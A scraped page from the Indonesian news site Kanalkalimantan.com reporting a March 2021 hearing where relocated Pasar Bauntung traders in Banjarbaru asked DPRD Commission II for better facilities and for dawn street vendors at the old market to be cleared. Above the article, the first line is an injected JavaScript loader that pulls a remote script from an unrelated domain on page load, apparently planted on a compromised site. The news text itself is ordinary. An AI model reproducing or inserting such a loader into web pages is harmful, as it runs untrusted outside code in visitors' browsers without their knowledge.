(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
DPRD BANJARBARU

Pedagang Pasar Bauntung Curhat ke Komisi II Minta Pemko Tertibkan PKL Subuh


KANAKALIMANTAN.COM, BANJARBARU – Sudah lebih dua pekan Pasar Bauntung baru di Jalan RO Ulin, Kecamatan Banjarbaru Selatan, dibuka. Para pedagang yang kini telah beraktivitas di lokasi baru pasca relokasi, menyampaikan aspirasi terkait kondisi yang dihadapi, saat hearing dengan Komisi II DPRD Banjarbaru yang dipimpin Ketua Komisi Syamsuri, Selasa (2/3/2021) sore, para pedagang mengemukakan sejumlah masalah. Turut mendampingi juga Ketua DPRD Banjarbaru Fadliansyah Akbar dan Wakil Ketua Taufik Rachman.

“Kami mengundang para pedagang pasar yang sudah menjalani proses relokasi beberapa waktu lalu. Kami ingin mendapatkan informasi dari pedagang terkait kondisi dan tanggapan mereka di Pasar Bauntung yang baru,” katanya, kepada Kanalkalimantan.com.

Sejumlah keluhan menjadi catatan para wakil rakyat yang duduk di kursi parlemen ini. Mulai dari fasilitas kurang memadai, kebersihan di kawasan pasar yang masih berdebu, hingga keamanan pasar yang perlu lebih ditingkatkan.

“Jadi tadi pedagang meminta ditambahkan ventilasi udara dan blower karena suhu di dalam gedung cukup lembab. Lalu, pedagang juga meminta WC ditambah. Petugas keamanan, termasuk cleaning service jumlahnya ditambah. Kemudian pedagang juga minta troli untuk pembeli diperbanyak,” bebernya.

 

Namun di antara seluruh aspirasi tersebut, Syamsuri menyebut permintaan pedagang yang terpenting ialah segera menutup Pasar Bauntung lama, yang berada di Jalan A Yani Km 34.

Bahkan, pedagang pasar Bauntung juga meminta pemerintah untuk segera menertibkan keberadaan Pedagang Kaki Lima (PKL) subuh yang sampai saat ini masih berjualan di area kawasan Pasar Bauntung lama.

“Pasar inikan niatnya memang mau pindah. Jadi menurut pedagang jangan ada yang ditinggalkan. Pedagang meminta Pemko menertibkan PKL subuh yang saat ini masih aktif berjualan di sana. Namun dengan syarat, pedagang meminta Pemko lebih dulu menawarkan solusi kepada para PKL,” cerita Syamsuri.

Disinggung soal alasannya, Syamsuri menerangkan bahwa pedagang Pasar Bauntung merasa dengan masih berlangsung aktivitas jual beli di pasar yang lama menyebabkan Pasar Bauntung baru sepi pembeli.

“Kalau pasar lama masih buka, pasar baru kena imbas yaitu sepi pembeli. Seluruh aspirasi dari para pedagang ini sudah kami tampung. Untuk kemudian kita akan bahas dengan stake holder terkait,” tuntas politisi partai Gerindra tersebut.

Salah satu pedagang juga turut membenarkan. “Iya, kami minta ditertibkan tapi pemerintah harus berikan solusi juga kepada PKL. Masyarakat kan sudah terbiasa belanja di pasar yang lama. Nah kalau itu tidak ditutup, kami yang berada di pasar baru malah sepi pembeli,” akunya. (kanalkalimantan.com/rico)

 

Reporter : Rico
Editor : Cell

 

 

 


Al Ghifari

Recent Posts

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

7 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

8 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

8 jam ago

Terbagi Tiga Kloter, Pj Bupati Kapuas Ingatkan Calon Haji Jaga Kondisi Kesehatan

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas Erlin Hardi melepas ratusan jemaah calon haji… Read More

8 jam ago

81 Peserta Ikuti Audisi Pemilihan Nanang dan Galuh Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Sebanyak 81 orang terdiri atas 27 laki-laki dan 54 perempuan dari beberapa… Read More

8 jam ago

Rumah di Banjarmasin Ambruk ke Sungai, Penghuni Keluar Lewat Jendela

KANALKALIMANTAN.COM, BANJARMASIN - Sebuah rumah di Jalan Sutoyo S, Gang Serumpun, Kelurahan Pelambuan, Kecamatan Banjarmasin… Read More

8 jam ago

This website uses cookies.